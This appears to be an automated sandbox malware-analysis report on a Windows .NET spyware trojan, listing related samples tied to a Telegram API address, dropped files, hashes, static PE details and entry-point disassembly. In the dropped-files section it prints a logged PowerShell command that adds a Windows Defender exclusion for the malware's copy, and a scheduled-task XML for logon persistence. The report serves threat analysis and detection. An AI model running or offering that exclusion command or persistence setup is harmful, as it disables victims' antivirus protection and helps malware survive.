                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@9/9@1/1
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HDC Information:
                                                  • Successful, ratio: 1.3% (good quality ratio 1.1%)
                                                  • Quality average: 61.7%
                                                  • Quality standard deviation: 37.3%
                                                  HCA Information:
                                                  • Successful, ratio: 89%
                                                  • Number of executed functions: 52
                                                  • Number of non-executed functions: 3
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, store-images.s-microsoft.com, login.live.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • VT rate limit hit for: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  20:50:03API Interceptor494x Sleep call for process: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe modified
                                                  20:50:12API Interceptor29x Sleep call for process: powershell.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  149.154.167.220doc20220010010021.pdf.exeGet hashmaliciousBrowse
                                                    SecuriteInfo.com.W32.AIDetectNet.01.12395.exeGet hashmaliciousBrowse
                                                      SecuriteInfo.com.W32.AIDetectNet.01.24645.exeGet hashmaliciousBrowse
                                                        SecuriteInfo.com.generic.ml.22865.exeGet hashmaliciousBrowse
                                                          Purchase Order.exeGet hashmaliciousBrowse
                                                            bank details.exeGet hashmaliciousBrowse
                                                              ow1AfiDuDe.exeGet hashmaliciousBrowse
                                                                SecuriteInfo.com.W32.AIDetectNet.01.12531.exeGet hashmaliciousBrowse
                                                                  SecuriteInfo.com.W32.AIDetect.malware2.14840.exeGet hashmaliciousBrowse
                                                                    SecuriteInfo.com.W32.AIDetectNet.01.18390.exeGet hashmaliciousBrowse
                                                                      6f.exeGet hashmaliciousBrowse
                                                                        Re_payment_invoices.pdf.exeGet hashmaliciousBrowse
                                                                          docCCF003066.exeGet hashmaliciousBrowse
                                                                            Halkbank_Ekstre_20220522_073809_405251.exeGet hashmaliciousBrowse
                                                                              dekond.exeGet hashmaliciousBrowse
                                                                                AKIBET202205250000000,xls.exeGet hashmaliciousBrowse
                                                                                  TransactionReportAdvice20220525_001920010191.exeGet hashmaliciousBrowse
                                                                                    20220525_733363884473.exeGet hashmaliciousBrowse
                                                                                      serin inv.1308.docGet hashmaliciousBrowse
                                                                                        AQ9jyGGZZS.exeGet hashmaliciousBrowse

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          api.telegram.orgdoc20220010010021.pdf.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          TRANSFER#U00caNCIA BANC#U00c1RIA 1517796961.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          SecuriteInfo.com.W32.AIDetectNet.01.12395.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          SecuriteInfo.com.W32.AIDetectNet.01.24645.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          SecuriteInfo.com.W32.AIDetectNet.01.14067.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          SecuriteInfo.com.generic.ml.22865.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          Purchase Order.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          bank details.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          ow1AfiDuDe.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          SecuriteInfo.com.W32.AIDetectNet.01.12531.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          SecuriteInfo.com.W32.AIDetect.malware2.14840.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          SecuriteInfo.com.W32.AIDetectNet.01.18390.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          6f.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          Re_payment_invoices.pdf.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          docCCF003066.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          Halkbank_Ekstre_20220522_073809_405251.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          dekond.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          AKIBET202205250000000,xls.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          TransactionReportAdvice20220525_001920010191.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          20220525_733363884473.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          TELEGRAMRUdoc20220010010021.pdf.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          SecuriteInfo.com.W32.AIDetectNet.01.12395.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          SecuriteInfo.com.W32.AIDetectNet.01.24645.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          kyTwt6MpdH.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.99
                                                                                          SecuriteInfo.com.generic.ml.22865.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          Purchase Order.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          https://telegra.ph/Income-from-1200-per-day-05-23-4?id79864Get hashmaliciousBrowse
                                                                                          • 149.154.164.13
                                                                                          bank details.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          ow1AfiDuDe.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          SecuriteInfo.com.W32.AIDetectNet.01.12531.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          SecuriteInfo.com.W32.AIDetect.malware2.14840.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          SecuriteInfo.com.W32.AIDetectNet.01.18390.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          6f.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          Re_payment_invoices.pdf.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          docCCF003066.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          N2ggWMNLYe.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.99
                                                                                          Halkbank_Ekstre_20220522_073809_405251.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          dekond.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          AKIBET202205250000000,xls.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          TransactionReportAdvice20220525_001920010191.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220

                                                                                          JA3 Fingerprints

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          3b5074b1b5d032e5620f69f9f700ff0edoc20220010010021.pdf.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          DHL PACKAGE DOCUMENT.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          W-4367-54-3--2-.lnkGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          90-868-7656.lnkGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          56516426-056C-4DBA-984B-979F68AB8D18 pdf.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          Znhawianj.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          Confirmation Transfer Ref_MT103_00234568910992898.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          ENQ # 1220014088.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          TT COPY Euro 57,890_CI0099484_pdf.vbsGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          SecuriteInfo.com.W32.AIDetectNet.01.12395.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          SecuriteInfo.com.W32.AIDetectNet.01.24645.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          SecuriteInfo.com.BackDoor.SiggenNET.35.30620.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          kyTwt6MpdH.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          methoden.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          https://nathanu.tk/.well-known/wp-content/smp/excelz/index.php&design=DAFBx6CPpccGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          SecuriteInfo.com.W32.AIDetectNet.01.24324.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          SecuriteInfo.com.generic.ml.22865.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          SecuriteInfo.com.W32.AIDetectNet.01.4805.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          Purchase Order.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          bank details.exeGet hashmaliciousBrowse
                                                                                          • 149.154.167.220

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.log

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:modified
                                                                                          Size (bytes):1308
                                                                                          Entropy (8bit):5.345811588615766
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                                                          MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                                                          SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                                                          SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                                                          SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                                                          Malicious:false
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):14734
                                                                                          Entropy (8bit):4.996142136926143
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:wt8OdB+Fiib4YNXp5dGxopbjvwRjdvRzJYociQ0HzAF8:w8OdB+FhNZT4opbjoRjdvRzJYocinHzr
                                                                                          MD5:8BFB5BDCC39FDA027B2D719367EBD70C
                                                                                          SHA1:C64E6B36FF61E6747F50645728D8F6DA280BC717
                                                                                          SHA-256:7EEAF90224B2598135FD21AA368D136E33E98B9E40CCB22D60D3B9D22E7A91EA
                                                                                          SHA-512:C367B45F7DCD8A65BF047C4D8FC9C5CB2E36E5FB196866F4753210EEAF2B8D284CCC817A8A4DC0D44E81DF346487379D745049F4B17FF30DCE8AB7CBC59337C2
                                                                                          Malicious:false
                                                                                          Reputation:moderate, very likely benign file
                                                                                          Preview:PSMODULECACHE.......`.....Q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1........Start-BitsTransfer........Set-BitsTransfer........Get-BitsTransfer........Resume-BitsTransfer........Add-BitsFile........Suspend-BitsTransfer........Complete-BitsTransfer........Remove-BitsTransfer........-vF.....[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1....#...Set-AppBackgroundTaskResourcePolicy........Unregister-AppBackgroundTask........Get-AppBackgroundTask........tid........pfn........iru....%...Enable-AppBackgroundTaskDiagnosticLog........Start-AppBackgroundTask....&...Disable-AppBackgroundTaskDiagnosticLog................a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Unins

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):22252
                                                                                          Entropy (8bit):5.600930086358679
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:atCDY06fVPfsKpZLpK3kSBKnIjultIE47nvfg3hInkML+KfmAV7SJWd+MZQvnI+K:ZKpZLqk4KICltXE66vKOp2K+Q
                                                                                          MD5:1414AAEC05F804A0D34793A833F82FC1
                                                                                          SHA1:F2274FA4AC682F9936EED33FAC8A9EE3B841D266
                                                                                          SHA-256:33A11C07F096E822399D6FC7B2898417FB253F6FFDAFD77F3E8FC1F75D3B4902
                                                                                          SHA-512:C393C1767BFF91B30A3570CE900BD2B38AC818A29E6EAC9E85A8513F0599681591C07383F7FDFD843D443365A8536F123D851D4D33E6363612D040ED41125B17
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview:@...e...........t.......K...9.2./....................@..........H...............<@.^.L."My...:W..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d33zcqbc.wco.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Preview:1

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gzbpsrc1.yqu.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Preview:1

                                                                                          C:\Users\user\AppData\Local\Temp\tmpCB43.tmp

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                                                                                          File Type:XML 1.0 document, ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):1596
                                                                                          Entropy (8bit):5.134924908448168
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2di4+S2qh/S1KTy1moCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaVaxvn:cgeKwYrFdOFzOzN33ODOiDdKrsuTTv
                                                                                          MD5:6F36C2CF6A288D4CB2690B9D13E15891
                                                                                          SHA1:D66864469FEF66B89B912C91DCEC93D1E5943049
                                                                                          SHA-256:DC19EAC109B6092AE8F7B9E8C0F0C06F49669D7408A7A2C9C9C6BB1E7156175F
                                                                                          SHA-512:88674385C5D92AEF4A8B334FBACEAAD55D6C071FBBFA4A962F48F7FCACEE1D9A13C6CA1FAAAC9EF642B4C76C033C8CDE2EC801F291CCBF5D38AB00D047EF294E
                                                                                          Malicious:true
                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <

                                                                                          C:\Users\user\AppData\Roaming\HksvOcmoc.exe

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):886272
                                                                                          Entropy (8bit):7.566668421486731
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:j0pGjZ16ryOpqfE5Cg0iAgCBBKWcZL/Z7W3bFqrdlBgo0iVSJj1sGVJt1q0j:gpGjmpaE4gN2BXcZR7+IrFgRj1bVF
                                                                                          MD5:ADEC785F7CBAA5AF9C8C7FA50CF91BAA
                                                                                          SHA1:D55FC2F774A1728526A753284E350AEA08E3B17D
                                                                                          SHA-256:FB6EB7EFDF26E5F8EAAB963DAB6A7FB808724A4288D4DF1FB8F146E13471E53D
                                                                                          SHA-512:FF0AFC52A2B2D18B16AE6DFE480966AF0B372C39B8C2738315DBAB03ADBFF0BED2F4C358ACAA09296D40A83C77BE8ED49FD82F1B0DA216353581B62EA18BE203
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 30%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b..............0.............^.... ........@.. ....................................@.....................................K.......X............................................................................ ............... ..H............text...d.... ...................... ..`.rsrc...X...........................@..@.reloc..............................@..B................@.......H........%...z............. Y...........................................0../.......(....8.....(....8....*.....%..}......}....8......0............{.........8......*8....8.......0..y.......8........E........8.......}....8........8.....*..9....8.....8.... ....(....9....&8.......{....:.....8.....{....}....8........0..........8....8....8......*..(......8......(......8......&~.......*...~....*..(....8......}....8.....(....8.......(....8.....*...N..o....(....&8....*.0..........8P..

                                                                                          C:\Users\user\AppData\Roaming\HksvOcmoc.exe:Zone.Identifier

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):26
                                                                                          Entropy (8bit):3.95006375643621
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                          Malicious:false
                                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                                          C:\Users\user\Documents\20220527\PowerShell_transcript.347688.Wnxtck4i.20220527205009.txt

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):5785
                                                                                          Entropy (8bit):5.403825327740831
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:BZJj8NJqDo1ZcZzj8NJqDo1Z5dvVjZCj8NJqDo1ZCMllAZX:x
                                                                                          MD5:8C9B86A68DE92A5286D498CBE35D068A
                                                                                          SHA1:F83313410A342E0780FABE083B3960A8DDD73635
                                                                                          SHA-256:C7B4FFE6FECD86389C2D31A208DC8D47542E3C09D34E357F7DD1A096E3DD6B56
                                                                                          SHA-512:6266FB9316CC39D846E6069706E072E075312C157CF7E46EA226D6EDF5678C53D4C9C046617D3090D00760B918917AD1961DBBF0232D2B16F75121973B2AE537
                                                                                          Malicious:false
                                                                                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220527205011..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 347688 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\HksvOcmoc.exe..Process ID: 6688..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220527205011..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\HksvOcmoc.exe..**********************..Windows PowerShell transcript start..Start time: 20220527205404..Username: computer\user..RunAs User: computer\user.

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):7.566668421486731
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                          File name:SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                                                                                          File size:886272
                                                                                          MD5:adec785f7cbaa5af9c8c7fa50cf91baa
                                                                                          SHA1:d55fc2f774a1728526a753284e350aea08e3b17d
                                                                                          SHA256:fb6eb7efdf26e5f8eaab963dab6a7fb808724a4288d4df1fb8f146e13471e53d
                                                                                          SHA512:ff0afc52a2b2d18b16ae6dfe480966af0b372c39b8c2738315dbab03adbff0bed2f4c358acaa09296d40a83c77be8ed49fd82f1b0da216353581b62ea18be203
                                                                                          SSDEEP:12288:j0pGjZ16ryOpqfE5Cg0iAgCBBKWcZL/Z7W3bFqrdlBgo0iVSJj1sGVJt1q0j:gpGjmpaE4gN2BXcZR7+IrFgRj1bVF
                                                                                          TLSH:B715C02876574E01C09D0BFE84C3642407E99E867865FB839D45BAD22B727D85FCBB83
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............0.............^.... ........@.. ....................................@................................

                                                                                          File Icon

                                                                                          Icon Hash:0b1b233b332b2b2b

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x4bfc5e
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                          Time Stamp:0x6290DBB9 [Fri May 27 14:10:01 2022 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:v4.0.30319
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          jmp dword ptr [00402000h]
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
